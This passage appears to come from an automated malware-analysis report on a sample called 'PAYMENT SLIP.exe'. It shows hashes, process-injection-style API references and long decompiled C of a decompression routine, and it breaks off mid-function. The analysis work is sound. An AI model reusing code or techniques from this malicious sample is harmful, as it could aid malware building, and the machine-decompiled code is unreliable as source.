              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-3198988653
              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 00B105BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 00B105E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B10605
              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00B1091F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadTerminateThread
              • String ID:
              • API String ID: 3842210937-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: c97396c2e9f7d9c14470ff56f23be2ff145c3b7f08fd3f1ed60ac0bf72dceb36
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: FD523935A50258EAEB60DBA4EC55BFDB7B5EF48700F604496E608EA2A1D3B05EC0DF05
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 99%
              			E00407090() {
              				signed int _t530;
              				void _t537;
              				signed int _t538;
              				signed int _t539;
              				unsigned short _t569;
              				signed int _t579;
              				signed int _t607;
              				void* _t627;
              				signed int _t628;
              				signed int _t635;
              				signed int* _t643;
              				void* _t644;
              
              				L0:
              				while(1) {
              					L0:
              					_t530 =  *(_t644 - 0x30);
              					if(_t530 >= 4) {
              					}
              					 *(_t644 - 0x40) = 6;
              					 *(_t644 - 0x7c) = 0x19;
              					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
              					while(1) {
              						L145:
              						 *(_t644 - 0x50) = 1;
              						 *(_t644 - 0x48) =  *(_t644 - 0x40);
              						while(1) {
              							L149:
              							if( *(_t644 - 0x48) <= 0) {
              								goto L155;
              							}
              							L150:
              							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
              							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
              							 *(_t644 - 0x54) = _t643;
              							_t569 =  *_t643;
              							_t635 = _t569 & 0x0000ffff;
              							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
              							if( *(_t644 - 0xc) >= _t607) {
              								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
              								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
              								_t628 = _t627 + 1;
              								 *_t643 = _t569 - (_t569 >> 5);
              								 *(_t644 - 0x50) = _t628;
              							} else {
              								 *(_t644 - 0x10) = _t607;
              								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
              								 *_t643 = (0x800 - _t635 >> 5) + _t569;
              							}
              							if( *(_t644 - 0x10) >= 0x1000000) {
              								L148:
              								_t487 = _t644 - 0x48;
              								 *_t487 =  *(_t644 - 0x48) - 1;
              								L149:
              								if( *(_t644 - 0x48) <= 0) {
              									goto L155;
              								}
              								goto L150;
              							} else {
              								L154:
              								L146:
              								if( *(_t644 - 0x6c) == 0) {
              									L169:
              									 *(_t644 - 0x88) = 0x18;
              									L170:
              									_t579 = 0x22;
              									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
              									_t539 = 0;
              									L172:
              									return _t539;
              								}
              								L147:
              								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
              								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              								_t484 = _t644 - 0x70;
              								 *_t484 =  &(( *(_t644 - 0x70))[1]);
              								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
              								goto L148;
              							}
              							L155:
              							_t537 =  *(_t644 - 0x7c);
              							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
              							while(1) {
              								L140:
              								 *(_t644 - 0x88) = _t537;
              								while(1) {
              									L1:
              									_t538 =  *(_t644 - 0x88);
              									if(_t538 > 0x1c) {
              										break;
              									}
              									L2:
              									switch( *((intOrPtr*)(_t538 * 4 +  &M004074FE))) {
              										case 0:
              											L3:
              											if( *(_t644 - 0x6c) == 0) {
              												goto L170;
              											}
              											L4:
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
              											_t538 =  *( *(_t644 - 0x70));
              											if(_t538 > 0xe1) {
              												goto L171;
              											}
              											L5:
              											_t542 = _t538 & 0x000000ff;
              											_push(0x2d);
              											asm("cdq");
              											_pop(_t581);
              											_push(9);
              											_pop(_t582);
              											_t638 = _t542 / _t581;
              											_t544 = _t542 % _t581 & 0x000000ff;
              											asm("cdq");
              											_t633 = _t544 % _t582 & 0x000000ff;
              											 *(_t644 - 0x3c) = _t633;
              											 *(_t644 - 0x1c) = (1 << _t638) - 1;
              											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
              											_t641 = (0x300 << _t633 + _t638) + 0x736;
              											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
              												L10:
              												if(_t641 == 0) {
              													L12:
              													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
              													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
              													goto L15;
              												} else {
              													goto L11;
              												}
              												do {
              													L11:
              													_t641 = _t641 - 1;
              													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
              												} while (_t641 != 0);
              												goto L12;
              											}
              											L6:
              											if( *(_t644 - 4) != 0) {
              												GlobalFree( *(_t644 - 4));
              											}
              											_t538 = GlobalAlloc(0x40, 0x600); // executed
              											 *(_t644 - 4) = _t538;
              											if(_t538 == 0) {
              												goto L171;
              											} else {
              												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
              												goto L10;
              											}
              										case 1:
              											L13:
              											__eflags =  *(_t644 - 0x6c);
              											if( *(_t644 - 0x6c) == 0) {
              												L157:
              												 *(_t644 - 0x88) = 1;
              												goto L170;
              											}
              											L14:
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
              											_t45 = _t644 - 0x48;
              											 *_t45 =  *(_t644 - 0x48) + 1;
              											__eflags =  *_t45;
              											L15:
              											if( *(_t644 - 0x48) < 4) {
              												goto L13;
              											}
              											L16:
              											_t550 =  *(_t644 - 0x40);
              											if(_t550 ==  *(_t644 - 0x74)) {
              												L20:
              												 *(_t644 - 0x48) = 5;
              												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
              												goto L23;
              											}
              											L17:
              											 *(_t644 - 0x74) = _t550;
              											if( *(_t644 - 8) != 0) {
              												GlobalFree( *(_t644 - 8));
              											}
              											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
              											 *(_t644 - 8) = _t538;
              											if(_t538 == 0) {
              												goto L171;
              											} else {
              												goto L20;
              											}
              										case 2:
              											L24:
              											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
              											 *(_t644 - 0x84) = 6;
              											 *(_t644 - 0x4c) = _t557;
              											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
              											goto L132;
              										case 3:
              											L21:
              											__eflags =  *(_t644 - 0x6c);
              											if( *(_t644 - 0x6c) == 0) {
              												L158:
              												 *(_t644 - 0x88) = 3;
              												goto L170;
              											}
              											L22:
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											_t67 = _t644 - 0x70;
              											 *_t67 =  &(( *(_t644 - 0x70))[1]);
              											__eflags =  *_t67;
              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
              											L23:
              											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
              											if( *(_t644 - 0x48) != 0) {
              												goto L21;
              											}
              											goto L24;
              										case 4:
              											L133:
              											_t559 =  *_t642;
              											_t626 = _t559 & 0x0000ffff;
              											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
              											if( *(_t644 - 0xc) >= _t596) {
              												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
              												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
              												 *(_t644 - 0x40) = 1;
              												_t560 = _t559 - (_t559 >> 5);
              												__eflags = _t560;
              												 *_t642 = _t560;
              											} else {
              												 *(_t644 - 0x10) = _t596;
              												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
              												 *_t642 = (0x800 - _t626 >> 5) + _t559;
              											}
              											if( *(_t644 - 0x10) >= 0x1000000) {
              												goto L139;
              											} else {
              												goto L137;
              											}
              										case 5:
              											L137:
              											if( *(_t644 - 0x6c) == 0) {
              												L168:
              												 *(_t644 - 0x88) = 5;
              												goto L170;
              											}
              											L138:
              											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
              											L139:
              											_t537 =  *(_t644 - 0x84);
              											L140:
              											 *(_t644 - 0x88) = _t537;
              											goto L1;
              										case 6:
              											L25:
              											__edx = 0;
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L36:
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) = 1;
              												 *(__ebp - 0x84) = 7;
              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											L26:
              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
              											__esi =  *(__ebp - 0x60);
              											__cl = 8;
              											__cl = 8 -  *(__ebp - 0x3c);
              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              											__ecx =  *(__ebp - 0x3c);
              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              											__ecx =  *(__ebp - 4);
              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              											__eflags =  *(__ebp - 0x38) - 4;
              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											if( *(__ebp - 0x38) >= 4) {
              												__eflags =  *(__ebp - 0x38) - 0xa;
              												if( *(__ebp - 0x38) >= 0xa) {
              													_t98 = __ebp - 0x38;
              													 *_t98 =  *(__ebp - 0x38) - 6;
              													__eflags =  *_t98;
              												} else {
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              												}
              											} else {
              												 *(__ebp - 0x38) = 0;
              											}
              											__eflags =  *(__ebp - 0x34) - __edx;
              											if( *(__ebp - 0x34) == __edx) {
              												L35:
              												__ebx = 0;
              												__ebx = 1;
              												goto L61;
              											} else {
              												L32:
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__ecx =  *(__ebp - 8);
              												__ebx = 0;
              												__ebx = 1;
              												__al =  *((intOrPtr*)(__eax + __ecx));
              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              												goto L41;
              											}
              										case 7:
              											L66:
              											__eflags =  *(__ebp - 0x40) - 1;
              											if( *(__ebp - 0x40) != 1) {
              												L68:
              												__eax =  *(__ebp - 0x24);
              												 *(__ebp - 0x80) = 0x16;
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												__eax =  *(__ebp - 0x2c);
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xa;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              												__eax =  *(__ebp - 4);
              												__eax =  *(__ebp - 4) + 0x664;
              												__eflags = __eax;
              												 *(__ebp - 0x58) = __eax;
              												goto L69;
              											}
              											L67:
              											__eax =  *(__ebp - 4);
              											__ecx =  *(__ebp - 0x38);
              											 *(__ebp - 0x84) = 8;
              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              											goto L132;
              										case 8:
              											L70:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xa;
              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              											} else {
              												__eax =  *(__ebp - 0x38);
              												__ecx =  *(__ebp - 4);
              												__eax =  *(__ebp - 0x38) + 0xf;
              												 *(__ebp - 0x84) = 9;
              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              											}
              											goto L132;
              										case 9:
              											L73:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												goto L90;
              											}
              											L74:
              											__eflags =  *(__ebp - 0x60);
              											if( *(__ebp - 0x60) == 0) {
              												goto L171;
              											}
              											L75:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
              											__eflags = _t259;
              											0 | _t259 = _t259 + _t259 + 9;
              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
              											goto L76;
              										case 0xa:
              											L82:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L84:
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xb;
              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											L83:
              											__eax =  *(__ebp - 0x28);
              											goto L89;
              										case 0xb:
              											L85:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__ecx =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x20);
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              											} else {
              												__eax =  *(__ebp - 0x24);
              											}
              											__ecx =  *(__ebp - 0x28);
              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
              											L89:
              											__ecx =  *(__ebp - 0x2c);
              											 *(__ebp - 0x2c) = __eax;
              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              											L90:
              											__eax =  *(__ebp - 4);
              											 *(__ebp - 0x80) = 0x15;
              											__eax =  *(__ebp - 4) + 0xa68;
              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              											goto L69;
              										case 0xc:
              											L99:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L164:
              												 *(__ebp - 0x88) = 0xc;
              												goto L170;
              											}
              											L100:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t334 = __ebp - 0x70;
              											 *_t334 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t334;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											__eax =  *(__ebp - 0x2c);
              											goto L101;
              										case 0xd:
              											L37:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L159:
              												 *(__ebp - 0x88) = 0xd;
              												goto L170;
              											}
              											L38:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t122 = __ebp - 0x70;
              											 *_t122 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t122;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L39:
              											__eax =  *(__ebp - 0x40);
              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              												goto L48;
              											}
              											L40:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												goto L54;
              											}
              											L41:
              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              											__ecx =  *(__ebp - 0x58);
              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              											 *(__ebp - 0x48) = __eax;
              											__eax = __eax + 1;
              											__eax = __eax << 8;
              											__eax = __eax + __ebx;
              											__esi =  *(__ebp - 0x58) + __eax * 2;
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edx = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												 *(__ebp - 0x40) = 1;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												__ebx = __ebx + __ebx + 1;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edx;
              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L39;
              											} else {
              												L45:
              												goto L37;
              											}
              										case 0xe:
              											L46:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L160:
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											L47:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t156 = __ebp - 0x70;
              											 *_t156 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t156;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											while(1) {
              												L48:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													break;
              												}
              												L49:
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t170 = __edx + 1; // 0x1
              													__ebx = _t170;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													continue;
              												} else {
              													L53:
              													goto L46;
              												}
              											}
              											L54:
              											_t173 = __ebp - 0x34;
              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              											__eflags =  *_t173;
              											goto L55;
              										case 0xf:
              											L58:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L161:
              												 *(__ebp - 0x88) = 0xf;
              												goto L170;
              											}
              											L59:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t203 = __ebp - 0x70;
              											 *_t203 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t203;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L60:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												L55:
              												__al =  *(__ebp - 0x44);
              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              												goto L56;
              											}
              											L61:
              											__eax =  *(__ebp - 0x58);
              											__edx = __ebx + __ebx;
              											__ecx =  *(__ebp - 0x10);
              											__esi = __edx + __eax;
              											__ecx =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												_t217 = __edx + 1; // 0x1
              												__ebx = _t217;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L60;
              											} else {
              												L65:
              												goto L58;
              											}
              										case 0x10:
              											L109:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L165:
              												 *(__ebp - 0x88) = 0x10;
              												goto L170;
              											}
              											L110:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t365 = __ebp - 0x70;
              											 *_t365 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t365;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											goto L111;
              										case 0x11:
              											L69:
              											__esi =  *(__ebp - 0x58);
              											 *(__ebp - 0x84) = 0x12;
              											goto L132;
              										case 0x12:
              											L128:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L131:
              												__eax =  *(__ebp - 0x58);
              												 *(__ebp - 0x84) = 0x13;
              												__esi =  *(__ebp - 0x58) + 2;
              												L132:
              												 *(_t644 - 0x54) = _t642;
              												goto L133;
              											}
              											L129:
              											__eax =  *(__ebp - 0x4c);
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											__eflags = __eax;
              											__eax =  *(__ebp - 0x58) + __eax + 4;
              											goto L130;
              										case 0x13:
              											L141:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L143:
              												_t469 = __ebp - 0x58;
              												 *_t469 =  *(__ebp - 0x58) + 0x204;
              												__eflags =  *_t469;
              												 *(__ebp - 0x30) = 0x10;
              												 *(__ebp - 0x40) = 8;
              												L144:
              												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
              												L145:
              												 *(_t644 - 0x50) = 1;
              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
              												goto L149;
              											}
              											L142:
              											__eax =  *(__ebp - 0x4c);
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											 *(__ebp - 0x30) = 8;
              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              											L130:
              											 *(__ebp - 0x58) = __eax;
              											 *(__ebp - 0x40) = 3;
              											goto L144;
              										case 0x14:
              											L156:
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              											__eax =  *(__ebp - 0x80);
              											while(1) {
              												L140:
              												 *(_t644 - 0x88) = _t537;
              												goto L1;
              											}
              										case 0x15:
              											L91:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              											__al = __al & 0x000000fd;
              											__eax = (__eflags >= 0) - 1 + 0xb;
              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              											goto L120;
              										case 0x16:
              											goto L0;
              										case 0x17:
              											while(1) {
              												L145:
              												 *(_t644 - 0x50) = 1;
              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
              												goto L149;
              											}
              										case 0x18:
              											goto L146;
              										case 0x19:
              											L94:
              											__eflags = __ebx - 4;
              											if(__ebx < 4) {
              												L98:
              												 *(__ebp - 0x2c) = __ebx;
              												L119:
              												_t393 = __ebp - 0x2c;
              												 *_t393 =  *(__ebp - 0x2c) + 1;
              												__eflags =  *_t393;
              												L120:
              												__eax =  *(__ebp - 0x2c);
              												__eflags = __eax;
              												if(__eax == 0) {
              													L166:
